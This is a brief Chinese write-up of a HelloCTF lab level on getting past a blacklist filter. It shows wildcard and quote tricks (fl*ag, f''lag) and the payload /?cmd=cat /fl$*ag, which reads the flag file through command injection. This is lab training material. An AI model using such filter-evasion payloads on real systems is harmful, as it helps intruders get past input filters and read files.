HelloCTF [RCE-labs] Level 5 - 黑名单式过滤

开启靶场,打开链接:

GET传参cmd,且对flag字符串进行了过滤

\*绕过,fl*ag

用'绕过,f''lag或f'l'ag

当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)


/?cmd=cat /fl$*ag

成功得到flag:

NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}

相关推荐
李钢蛋29 分钟前
PHP函数---function_exists()详解
开发语言·php
不如喫茶去44 分钟前
PHP将图片合成gif动图
php·php生成gif·图片生成gif·合成gif
Hacker_LaoYi1 小时前
网络安全之接入控制
网络·web安全·智能路由器
全栈小53 小时前
【PHP】部署和发布PHP网站到IIS服务器
服务器·开发语言·php
饮啦冰美式3 小时前
php如何定位问题
开发语言·php
网络安全指导员4 小时前
SQL注入的那些面试题总结
数据库·sql·安全·web安全·系统安全
网络安全King4 小时前
网络安全设备系列--安全隔离网闸
网络·安全·web安全
夜色呦6 小时前
实验室管理自动化:Spring Boot技术的应用
spring boot·自动化·php
Wh1teR0se9 小时前
[极客大挑战 2019]Secret File--详细解析
前端·web安全·网络安全
夜色呦11 小时前
Spring Boot实验室管理系统:高效科研管理解决方案
数据库·spring boot·php